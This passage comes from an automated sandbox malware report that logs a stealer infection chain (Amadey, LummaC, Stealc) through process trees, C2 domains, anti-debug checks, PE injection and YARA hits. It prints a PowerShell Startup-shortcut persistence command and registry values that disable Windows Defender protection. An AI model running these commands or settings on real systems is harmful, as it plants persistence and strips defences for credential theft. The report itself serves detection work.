                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess queried: DebugPort
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_04A7029D rdtsc 9_2_04A7029D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C7BAC62
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_0027652B mov eax, dword ptr fs:[00000030h]9_2_0027652B
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_0027A302 mov eax, dword ptr fs:[00000030h]9_2_0027A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_0032A302 mov eax, dword ptr fs:[00000030h]10_2_0032A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_0032652B mov eax, dword ptr fs:[00000030h]10_2_0032652B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C7BAC62
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00A92C31 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00A92C31
                    Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 309de20225.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 309de20225.exe PID: 3604, type: MEMORYSTR
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeMemory written: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe base: 400000 value starts with: 4D5A
                    LummaC encrypted strings found
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tamedgeesy.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: relalingj.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rottieud.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: brownieyuz.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: explainvees.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ducksringjk.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: thinkyyokej.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: repostebhu.sbs
                    Source: crypted.exe, 0000000F.00000002.2623307931.00000000049F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: terracedjz.cyou
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: scriptyprefej.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: navygenerayk.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: founpiuer.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: necklacedmny.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: thumbystriw.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: fadehairucw.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: crisiwarny.store
                    Source: c61fcc859d.exe, 00000017.00000002.2779390078.00000000005D1000.00000040.00000001.01000000.00000014.sdmpString found in binary or memory: presticitpo.store
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDGHCBAAEHC.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsDGHCBAAEHC.exe "C:\Users\user\DocumentsDGHCBAAEHC.exe" Jump to behavior
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe "C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe "C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tyds.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1005552001\pidgeon.exe'; $s.save()"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\fvgp.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1005552001\pidgeon.exe'; $s.save()"
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tyds.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1005552001\pidgeon.exe'; $s.save()"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\fvgp.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1005552001\pidgeon.exe'; $s.save()"
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C804760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,0_2_6C804760
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,0_2_6C6E1C30
                    Source: DocumentsDGHCBAAEHC.exe, DocumentsDGHCBAAEHC.exe, 00000009.00000002.2045451312.0000000000470000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 0000000A.00000002.2075719174.0000000000520000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Program Manager
                    Source: file.exe, file.exe, 00000000.00000002.1958879838.0000000000F25000.00000040.00000001.01000000.00000003.sdmp, 309de20225.exe, 00000018.00000002.2623475534.00000000009F5000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: PProgram Manager
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7BAE71 cpuid 0_2_6C7BAE71
                    Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeQueries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7BA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6C7BA8DC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C708390 NSS_GetVersion,0_2_6C708390
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Disable Windows Defender notifications (registry)
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                    Disable Windows Defender real time protection (registry)
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                    Disables Windows Defender Tamper protection
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeRegistry value created: TamperProtection 0
                    Modifies windows update settings
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                    Source: Amcache.hve.22.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.22.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.22.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: c61fcc859d.exe, 00000017.00000003.2674681113.00000000010CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
                    Source: c61fcc859d.exe, 00000017.00000003.2644957453.00000000010CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: c61fcc859d.exe, 00000017.00000003.2651983141.00000000010EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.22.drBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 10.2.skotes.exe.2f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.DocumentsDGHCBAAEHC.exe.240000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2044754812.0000000000241000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2075058050.00000000002F1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Stealc
                    Source: Yara matchFile source: 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2794500824.0000000005E01000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000003.2560756290.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1685179886.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1958673273.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.2847395793.0000000000621000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000003.2793400829.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1958471071.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
